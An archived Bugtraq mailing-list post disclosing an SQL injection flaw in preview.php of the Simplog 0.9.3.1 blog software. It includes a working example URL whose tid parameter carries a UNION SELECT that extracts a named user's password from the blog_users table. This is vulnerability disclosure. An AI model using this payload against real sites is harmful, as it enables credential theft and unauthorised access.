Home page logo
/

bugtraq logo Bugtraq mailing list archives

SQL Injection simplog
From: navairum () gmail com
Date: 19 Oct 2006 19:27:41 -0000

Softare: Simplog www.simplog.org
version:0.9.3.1 (i assume others as well)

There are a few sql injections available with this software.  This one is in preview.php


eg.

http://site/preview.php?blogid=2&adm=tem&tid=-1%20union%20select%20password%20from%20blog_users%20where%20name='[insert 
username here]'


  By Date           By Thread  

Current thread:
  • SQL Injection simplog navairum (Oct 19)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault